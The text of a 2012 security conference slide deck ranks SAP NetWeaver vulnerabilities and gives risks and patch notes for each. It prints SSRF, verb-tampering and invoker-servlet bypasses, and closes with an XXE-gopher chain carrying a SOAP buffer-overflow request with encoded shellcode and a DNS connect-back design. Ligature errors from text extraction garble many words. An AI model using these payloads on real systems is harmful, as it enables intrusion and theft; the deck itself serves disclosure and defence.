Invest in security to secure investments
Top 10 most interes.ng SAP vulnerabili.es and a9acks + bonus
Alexander Polyakov. CTO at ERPScan
1
About ERPScan
• The only 360-‐degree SAP Security solu8on -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presenta.ons key security conferences worldwide • 25 Awards and nomina.ons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
What is SAP ?
Shut up And Pay
3
Really
• The most popular business applica8on • More than 120000 customers • 74% of Forbes 500
4
Agenda
• Intro • SAP security history • SAP on the Internet • Top 10 latest interes8ng aPacks • DEMOs • Conclusion
5
6
3 areas of SAP Security
2010 Applica3on pla4orm security
Prevents unauthorized access both insiders and remote a3ackers
Solu8on: Vulnerability Assessment and Monitoring
2008
ABAP Code security Prevents a3acks or mistakes made by developers Solu8on: Code audit
2002
Business logic security (SOD) Prevents a3acks or mistakes made Solu8on: GRC
Talks about SAP security
0
5
10
15
20
25
30
35
2006 2007 2008 2009 2010 2011 2012
Most popular: • BlackHat • HITB • Troopers • RSA • Source • DeepSec • etc.
7
SAP Security notes
0
100
200
300
400
500
600
700
800
900
2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012
By june, 2012, more than 2300 notes
8
SAP vulnerabili.es by type
0 50 100 150 200 250 300 350
12 -‐SQL Inj
11 -‐ BOF
10 -‐ Denial of service
9 -‐ Remote Code Execu8on
8 -‐ Verb tampering
7 -‐ Code injec8on vulnerability
6 -‐ Hard-‐coded creden8als
5 -‐ Unauthorized usage of applica8on
4 -‐ Informa8on Disclosure
3 -‐ Missing Auth check
2 -‐ XSS/Unauthorised modifica8on of stored
1 -‐ Directory Traversal
Stats from : • 1Q 2012 • 1Q 2010 • 4Q 2009
9
Top problems by OWASP-‐EAS
• EASAI-‐1 Lack of patch management • EASAI-‐2 Default Passwords for applica8on access • EASAI-‐3 SOD conflicts • EASAI-‐4 Unnecessary Enabled Applica8on features • EASAI-‐5 Open Remote management interfaces • EASAI-‐6 lack of password lockout/complexity checks • EASAI-‐7 Insecure op8ons • EASAI-‐8 Unencrypted communica8ons • EASAI-‐9 Insecure trust rela8ons • EASAI-‐10 Guest access
10
Top problems by BIZEC
• BIZEC TEC-‐01: Vulnerable Sohware in Use • BIZEC TEC-‐02: Standard Users with Default Passwords • BIZEC TEC-‐03: Unsecured SAP Gateway • BIZEC TEC-‐04: Unsecured SAP/Oracle authen.ca.on • BIZEC TEC-‐05: Insecure RFC interfaces • BIZEC TEC-‐06: Insufficient Security Audit Logging • BIZEC TEC-‐07: Unsecured SAP Message Server • BIZEC TEC-‐08: Dangerous SAP Web Applica8ons • BIZEC TEC-‐09: Unprotected Access to Administra8on Services • BIZEC TEC-‐10: Insecure Network Environment • BIZEC TEC-‐11: Unencrypted Communica8ons
11
Business Risks
• Espionage – Stealing financial informa8on – Stealing corporate secrets – Stealing suppliers and customers list – Stealing HR data
• Sabotage – Denial of service – Modifica8on of financial reports – Access to technology network (SCADA) by trust rela8ons
• Fraud – False transac8ons – Modifica8on of master data – e.t.c.
12
SAP in the Internet
• We have collected data about SAP systems in the WEB • Have various stats by countries, applica8ons, versions • Informa8on from Google, Shodan, Nmap scan • Published in “SAP Security in figures: a global survey
2007-‐2011” • Upda8ng results at sapscan.com
MYTH: SAP systems a9acks available only for insiders
13
SAP in the Internet (web-‐services)
2 SAP web services can be found in internet (In Hungary) 14
SAP in the Internet (other services)
15
> 5000 non-‐web SAP services exposed in the world >50 in Hungary Including Dispatcher, Message server, SapHostcontrol,etc
SAP in the Internet (other services)
16
% of companies that expose different services
0 2 4 6 8
10 12 14 16
Hungary
World
Top 10 vulnerabili.es 2011-‐2012
1. Authen8ca8on Bypass via Verb tampering 2. Authen8ca8on Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execu8on via TH_GREP 5. MMC read SESSIONID 6. Remote portscan 7. Encryp8on in SAPGUI 8. BAPI XSS/SMBRELAY 9. XML Blowup DOS 10. GUI Scrip8ng DOS
NNw NNw
NNw
NNw
NNw
17
10 – GUI-‐Scrip.ng DOS: Descrip.on
• SAP users can run scripts which automate their user func8ons • A script has the same rights in SAP as the user who launched it • Security message which is shown to user can be turned off in
the registry • Almost any user can use SAP Messages (SM02 transac8on) • It is possible to run DOS aPack on any user using a simple script
New
Author: Dmitry Chastukhin (ERPScan)
18
10 – GUI-‐scrip.ng: Other a9acks
Script can be uploaded using:
– SAPGUI Ac8veX vulnerability – Teensy USB flash – Any other method of client exploita8on
Other a9acks like changing banking accounts in LFBK also possible
19
10 – GUI-‐scrip.ng: Business risks
Sabotage – High
Ease of exploita.on – Medium
Espionage – No
Fraud – No
20
Top 10 vulnerabili.es 2011-‐2012
1. Authen8ca8on Bypass via Verb tampering 2. Authen8ca8on Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execu8on via TH_GREP 5. MMC read SESSIONID 6. Remote portscan 7. Encryp8on in SAPGUI 8. BAPI XSS/SMBRELAY 9. XML Blowup DOS 10. GUI Scrip8ng DOS
NNw NNw
NNw
NNw
NNw
21
10 – GUI-‐scrip.ng: Preven.on
22
• SAP GUI Scrip8ng Security Guide • Don’t ac8vate SAP GUI Scrip8ng if you do not need it sapgui/user_scrip8ng = FALSE (dafault)
• Scrip8ng with read only capabili8es use the parameter -‐ sapgui/user_scrip8ng = TRUE -‐ sapgui/user_scrip8ng_set_readonly = TRUE
• Block registry modifica8on on worksta8ons
9 – XML Blowup DOS: Descrip.on
• WEBRFC interface can be used to run RFC func8ons • By default any user can have access • Can execute at least RFC_PING • SAP NetWeaver is vulnerable to malformed XML packets • It is possible to run DOS aPack on server using simple script • It is possible to run over the Internet!
23
Author: Alexey Tyurin (ERPScan)
9 – XML Blowup DOS: Business risks
24
Ease of exploita.on – Medium
Espionage – No
Fraud – No
Sabotage – Cri.cal
9 – XML Blowup DOS: Preven.on
25
• Disable WEBRFC • Prevent unauthorized access to WEBRFC using S_ICF • Install SAP notes 1543318 and 1469549 and 139410032
8 – BAPI script injec.on/hash stealing : Descrip.on
• SAP BAPI transac8on fails to properly sani8ze input
• Possible to inject JavaScript code or link to a fake SMB server • SAP GUI clients use Windows so their creden8als will be
transferred to aPackers host.
26
Author: Dmitry Chastukhin (ERPScan)
8 – BAPI script injec.on/hash stealing
27
8 – BAPI script injec.on: Business risks
28
Ease of exploita.on – Low
Sabotage – High
Espionage – High
Fraud – High
8 – BAPI script injec.on: Preven.on
29
• Install SAP notes 1569550
7 – SAP GUI bad encryp.on: Descrip.on
• SAP FrontEnd can save encrypted passwords in shortcuts • Shortcuts stored in .sap file • This password uses byte-‐XOR algorithm with “secret” key • Key has the same value for every installa8on of SAP GUI • Any password can be decrypted in less than second
30
Author: Alexey Sintsov (ERPScan)
7 – SAP GUI bad encryp.on: Demo
31
7 – SAP GUI bad encryp.on: Business risks
32
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploita.on – Medium
Disable password storage in GUI
7 – SAP GUI bad encryp.on: Preven.on
33
6 – Remote port scan/SSRF: Descrip.on
• It is possible to scan internal network from the Internet • Authen8ca8on is not required • SAP NetWeaver J2EE engine is vulnerable
• /ipcpricing/ui/BufferOverview.jsp? • server=172.16.0.13 • & port=31337 • & password= • & dispatcher= • & targetClient= • & view=
34
Author: Alexander Polyakov (ERPScan)
6 – Remote port scan/SSRF: Demo
35
Port closed
HTTP port
SAP port
6 – Remote port scan/SSRF: Business risks
36
Ease of exploita.on – High
Espionage – Medium
Fraud – No
Sabotage – Low
6 – Remote port scan/SSRF: Preven.on
37
• Disable unnecessary applica8ons • Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883
5 – MMC JSESSIONID stealing: Descrip.on
• Remote management of SAP Playorm • By default, many commands go without auth • Exploits implemented in Metasploit (by ChrisJohnRiley) • Most of the bugs are informa8on disclosure • It is possible to find informa8on about JSESSIONID • Only if trace is ON
38
Can be authen.cated as an exis.ng user remotely
1) Original bug by ChrisJohnRiley 2) JSESSIONID by Alexey Sintsov and
Alexey Tyurin (ERPScan)
5 – MMC JSESSIONID stealing: Business risks
39
Espionage – Cri.cal
Sabotage – Medium
Fraud – High
Ease of exploita.on – Medium
5 – MMC JSESSIONID stealing: Preven.on
40
Don’t use TRACE_LEVEL = 3 on produc8on systems or delete traces
hPp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
4 – RCE in TH_GREP: Descrip.on
• RCE vulnerability in RFC module TH_GREP • Found by Joris van de Vis • SAP was not properly patched (1433101) • We have discovered that the patch can be bypassed in Windows
41
Original bug by Joris van de Vis (erp-‐sec) Bypass by Alexey Tyurin (ERPScan)
4 – RCE in TH_GREP: Details
• elseif opsys = 'Windows NT'.
• concatenate '/c:"' string '"' filename into grep_params in character mode.
• else. /*if linux*/ • /* 185 */ replace all occurrences of '''' in local_string with '''"''"'''.
/* 186 */ concatenate '''' local_string '''' filename into grep_params /* 187*/ in character mode. /* 188*/ endif.
• /* 188*/
42
4 – RCE in TH_GREP: Demo #1
43
4 -‐ RCE in TH_GREP: More details
4 ways to execute vulnerable program: • Using transac8on "Se37“ • Using transac8on “SM51“ (thanks to Felix Granados) • Using remote RFC call "TH_GREP" • Using SOAP RFC call "TH_GREP" via web
44
4 – RCE in TH_GREP: Demo #2
45
4 – RCE in TH_GREP: Business risks
46
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploita.on – medium
4 – RFC in TH_GREP: Preven.on
47
• Install SAP notes 1580017, 1433101 • Prevent access to cri8cal transac8ons and RFC func8ons • Check the ABAP code of your Z-‐transac8ons for similar vulnerabili8es
3 -‐ ABAP Kernel BOF: Descrip.on
• Presented by Andreas Wiegenstein at BlackHat EU 2011
• Buffer overflow in SAP kernel func8on C_SAPGPARAM
• When NAME field is more than 108 chars
• Can be exploited by calling an FM which uses C_SAPGPARAM
• Example of report – RSPO_R_SAPGPARAM
48
Author: (VirtualForge)
3 – ABAP Kernel BOF: Business risks
49
Ease of exploita.on – Medium
Espionage – Cri.cal
Fraud – Cri.cal
Sabotage – Cri.cal
3 – ABAP Kernel BOF: Preven.on
50
• Install SAP notes: -‐ 1493516 – Correc8ng buffer overflow in ABAP system call -‐ 1487330 – Poten8al remote code execu8on in SAP Kernel
• Prevent access to cri8cal transac8ons and RFC func8ons • Check the ABAP code of your Z-‐transac8ons for cri8cal calls
2 – Invoker Servlet: Descrip.on
• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from the applica8on
• Even if it is not declared in WEB.XML
51
Can be used for auth bypass
2 -‐ Invoker Servlet: Details
<servlet> <servlet-‐name>Cri8calAc8on</servlet-‐name> <servlet-‐class>com.sap.admin.Cri8cal.Ac8on</servlet-‐class> </servlet> <servlet-‐mapping> <servlet-‐name>Cri8calAc8on</</servlet-‐name> <url-‐paPern>/admin/cri8cal</url-‐paPern> </servlet-‐mapping <security-‐constraint> <web-‐resource-‐collec8on> <web-‐resource-‐name>Restrictedaccess</web-‐resource-‐name> <url-‐paPern>/admin/*</url-‐paPern> <hPp-‐method>GET</hPp-‐method> </web-‐resource-‐collec8on> <auth-‐constraint> <role-‐name>admin</role-‐name> </auth-‐constraint> </security-‐constraint>
52
Author: Dmitry Chastukhin (ERPScan)
What if we call /servlet/com.sap.admin.Cri.cal.Ac.on
2 – Invoker servlet: Business risks
53
Ease of use – Very easy!
Espionage – High
Sabotage – High
Fraud – High
2 -‐ Invoker servlet: Preven.on
54
• Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” must be “false” • Check all WEB.XML files by ERPScan WEBXML checker
1 – VERB Tampering
55
1st Place – Verb Tampering
<security-‐constraint> <web-‐resource-‐collec8on> <web-‐resource-‐name>Restrictedaccess</web-‐resource-‐name> <url-‐paPern>/admin/*</url-‐paPern> <hPp-‐method>GET</hPp-‐method> </web-‐resource-‐collec8on> <auth-‐constraint> <role-‐name>admin</role-‐name> </auth-‐constraint> </security-‐constraint>
56
What if we use HEAD instead of GET ?
Author: Alexander Polyakov (ERPScan)
1st Place – Verb tampering: Details
57
Remotely without authen.ca.on!
• CTC -‐ interface for managing J2EE engine • Can be accessed remotely • Can run user management ac8ons:
– Add users – Add to groups – Run OS commands – Start/Stop J2EE
1 – Verb tampering: More details
58
If patched, can be bypassed by the Invoker servlet!
1 – Verb tampering: Business risks
59
Espionage – Cri.cal
Sabotage – Cri.cal
Fraud – Cri.cal
Ease of use – Very easy!
1st Place – Verb tampering: Preven.on
60
• Install SAP notes 1503579,1616259 • Install other SAP notes about Verb Tampering • Scan applica8ons by ERPScan WEB.XML checker • Disable the applica8ons that are not necessary
Bonus Track!
• DilbertMSG web service • No I’m not kidding • Use Soap XML • For tes8ng purpose • Shipped with SAP PI < 7.1 by default • Accessed without authoriza8on • Patched just month ago in SAP Security note 1707494
Epic! 61
Bonus track! XXE Tunneling
<?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/
AAAAAAAAA" >]> <foo>&date;</foo>
62
What will happen??
XXE Tunneling details
63
Server B (ERP, HR, BW etc.)
Server A (Portal or XI)
192.168.0.1
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: 192.168.0.1:8000 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo>
AAAAAAAAA
Port 3300
telnet 172.16.0.1 3300
XXE Tunneling to Buffer Overflow (step 1)
• A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in SAP note 1487330)
• Hard to exploit because it requires calling an RFC func8on which calls Kernel func8on
• We exploit it via WEBRFC • Can be fixed by SAP notes: 1394100,1536640,1528822,1453457 • According to our report, WEBRFC is installed in 40% of
NetWeaver ABAP, even on the Internet
64
XXE Tunneling to Buffer Overflow (step 2)
65
• Shellcode size is limited to 255 bytes (name parameter) • As we don’t have direct connec8on to the Internet from the
vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory (XML Spraying)
• So we can use egghunter • Any shellcode can be uploaded
XXE Tunneling to Buffer Overflow (Step 3)
66
POST /sap/bc/soap/rfc?sap-‐client=000 HTTP/1.1 Authoriza8on: Basic U1FQKjowMjA3NTk3== Host: company.com:80 User-‐Agent: ERPSCAN Pentes8ng tool v 0.2 Content-‐Type: text/xml; charset=uy-‐8 Cookie: sap-‐client=000 Content-‐Length: 2271 <SOAP-‐ENV:Envelope xmlns:SOAP-‐ENV="hPp://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-‐ENC="hPp://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="hPp://www.w3.org/2001/XMLSchema-‐instance" xmlns:xsd="hPp://www.w3.org/2001/XMLSchema"><SOAP-‐ENV:Body><m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-‐com:document:sap:rfc:func8ons"><HEAP_EGG>dsecdsechff�4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</HEAP_EGG><NAME>ºÿÿÎ<fÊÿBRjCXÍ.<Ztï¸dsec‹ú¯uê¯uçÿ琐AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAž¾«DSEC^ü1+ÔSò�:G�ú/9LÿT���â_�@���a}Xs§quڝ�€E�RYëë†Æ�ÿÿéMÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</NAME></m:RSPO_R_SAPGPARAM></SOAP-‐ENV:Body></SOAP-‐ENV:Envelope>
XXE Tunneling to Buffer Overflow (Step 4)
• Next step is to pack this packet B into Packet A • We need to insert non-‐printable symbols • God bless gopher; it supports urlencode like HTTP • It will also help us evade aPack against IDS systems
67
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 Content-‐Length: 7730 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://[Urlencoded Packet B]" >]> <foo>&date;</foo>
Packet A
XXE Tunneling to Buffer Overflow: Final step
68
Server B in DMZ (SAP ERP)
Server A on the Internet (SAP XI)
hPp://company.com
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://[packetB]" >]> <foo>&date;</foo>
Port 8000 WebRFC service
Packet B
Shellcode service with DNS payload
Packet C – Command and Control response to a9acker by DNS protocol which is allowed for outband connec.ons
Full control over the internal system through the Internet
69
Conclusion
It is possible to be protected from almost all those kinds of issues and we are working hard with SAP to make it secure
70
It’s all in your hands
SAP Guides Regular Security assessments
ABAP Code review
Monitoring technical security
Segrega.on of Du.es
Future work
Many of the researched things cannot be disclosed now because of our good relaDonship with SAP Security Response Team, whom I would like to thank for cooperaDon. However, if you want to see new demos and 0-‐days, follow us at @erpscan and a3end the future presentaDons:
• 16 October -‐ IT Security Expo (Germany,Nurnberg) • 30 October -‐ HackerHalted (USA,Miami) • 2-‐3 November -‐ HashDays (Switzerland,Lucerne) • 8-‐9 November -‐ POC In Korea (Korea,Seul) • 20 November – ZeroNights (Russia,Moscow) • 29 November-‐ DeepSEC (Austria,Vienna) 71
Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.
72